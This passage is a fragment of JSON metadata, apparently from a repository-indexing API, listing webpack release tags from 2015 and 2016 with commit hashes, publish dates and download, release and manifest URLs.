26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/w